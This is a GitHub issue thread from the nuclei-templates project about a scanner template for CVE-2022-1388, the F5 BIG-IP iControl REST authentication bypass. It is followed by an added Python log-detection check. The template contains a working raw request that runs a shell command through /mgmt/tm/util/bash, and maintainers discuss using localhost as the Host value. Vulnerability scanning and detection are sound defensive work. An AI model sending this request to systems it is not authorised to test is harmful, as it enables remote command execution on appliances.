projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page: https://github.com/projectdiscovery/nuclei

[nuclei-template] CVE-2022-1388

rhbb opened this issue · comments

commented

CVE-2022-1388

id: bigip-icontrol-rest-rce

info:
  name: F5 BIG-IP iControl REST Panel RCE
  author: rhbb
  severity: critical
  tags: CVE-2022-1388,bigip,f5

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        Authorization: Basic YWRtaW46
        X-F5-Auth-Token: 0
        Content-Length: 32

        {"command":"run","utilCmdArgs":"-c whoami"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "-c whoami"
        part: body
 
    extractors:
      - type: regex # type of the extractor
        part: body
        name: whoami
        regex:
          - "lt(.*?)}"  # regular expression applied to the response body

Hello @rhbb, thank you so much for sharing this template with the community and contributing to this project 🚀

Could you please provide any references to this CVE?

commented

@rhbb it is CVE-2022-1388

Thanks, I wrote the wrong title.

commented

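Hello @rhbb, thank you so much for sharing this template with the community and contributing to this project 🚀

Could you please provide any references to this CVE?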

Sorry, I wrote the wrong title. The real CVE number is CVE-2022-1388

@rhbb, thanks for confirming, there is an existing template for CVE-2022-1388.

https://github.com/projectdiscovery/nuclei-templates/blob/f9787a75fdda1e8fce10a33c46a22a0505f0c9cc/cves/2022/CVE-2022-1388.yaml

commented

@ehsandeep can we update the template with localhost as Host?

Source: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

Yeah, we had to change hostname to localhost to get positives on our version of the software.

commented

@pizza-power @rhbb @DhiyaneshGeek localhost has been added in latest release - https://github.com/projectdiscovery/nuclei-templates/releases/tag/v9.0.1

Cool, thanks. Was gonna submit it myself, but saw that. Appreciate the work!
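
Added example, not part of the thread or of the nuclei-templates project: a defender-side check that flags logged raw requests carrying the header pattern from the template posted above (X-F5-Auth-Token named in the Connection header on a /mgmt/ path) and the localhost Host value discussed later in the thread. The function names and the sample requests are constructed for illustration.

```python
# Added example: indicators taken from the request posted in this issue thread.
# All sample requests below are constructed for illustration.

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        key = name.strip().lower()
        # Join repeated headers so a split Connection header is still seen whole.
        headers[key] = ", ".join(filter(None, [headers.get(key), value.strip()]))
    return method, path, headers

def check_request(raw):
    """Return findings for one request; an empty list means nothing flagged."""
    _method, path, headers = parse_request(raw)
    path = path.lower()
    if not path.startswith("/mgmt/"):
        return []
    findings = []
    listed = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in listed:
        findings.append("Connection lists X-F5-Auth-Token as hop-by-hop")
    if headers.get("host", "").split(":")[0].lower() == "localhost":
        findings.append("Host header is localhost")
    if findings and path.startswith("/mgmt/tm/util/bash"):
        findings.append("targets /mgmt/tm/util/bash")
    return findings

SAMPLES = {  # constructed requests; 192.0.2.10 is a documentation address
    "as_posted": "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                 "Connection: keep-alive, X-F5-Auth-Token\r\n"
                 "X-F5-Auth-Token: 0\r\n\r\n{}",
    "localhost_host": "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: localhost\r\n"
                      "Connection: keep-alive\r\nConnection: x-f5-auth-token\r\n\r\n{}",
    "normal_api_call": "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: 192.0.2.10\r\n"
                       "Connection: keep-alive\r\nX-F5-Auth-Token: EXAMPLETOKEN\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, check_request(raw) or "clean")
```

A request that sends X-F5-Auth-Token normally, without naming it in Connection, is not flagged, so routine iControl REST traffic stays quiet.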